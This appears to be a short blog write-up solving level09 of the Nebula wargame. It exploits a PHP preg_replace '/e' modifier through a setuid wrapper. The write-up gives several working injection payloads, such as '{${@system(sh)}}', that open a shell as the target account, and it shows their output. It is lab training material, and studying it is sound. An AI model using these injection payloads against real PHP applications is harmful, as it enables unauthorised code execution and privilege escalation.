This level has a setuid binary which acts as a wrapper to execute a php script. The php script uses preg_replace with "e" modifier which makes it vulnerable to code injection. $PATH variable is defined as PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
$contents = preg_replace("/(\[email (.*)\])/e", "spam(\"\\2\")", $contents);There are many ways to solve this level. Here is a few:
level09@nebula:/home/flag09$ echo '[email flag@gmail.com]' > /tmp/mail level09@nebula:/home/flag09$ ./flag09 /tmp/mail asdf flag AT gmail dot com level09@nebula:/home/flag09$ echo '[email {${@system(sh)}}]' > /tmp/mail level09@nebula:/home/flag09$ ./flag09 /tmp/mail asdf sh-4.2$ getflag You have successfully executed getflag on a target account level09@nebula:/home/flag09$ echo '[email {${@system($use_me)}}]' > /tmp/mail level09@nebula:/home/flag09$ ./flag09 /tmp/mail sh sh-4.2$ getflag You have successfully executed getflag on a target account level09@nebula:/home/flag09$ echo '[email {${@system(DIRECTORY_SEPARATOR.bin.DIRECTORY_SEPARATOR.sh)}}]' > /tmp/mail level09@nebula:/home/flag09$ ./flag09 /tmp/mail asdf sh-4.2$ getflag You have successfully executed getflag on a target account
No comments:
Post a Comment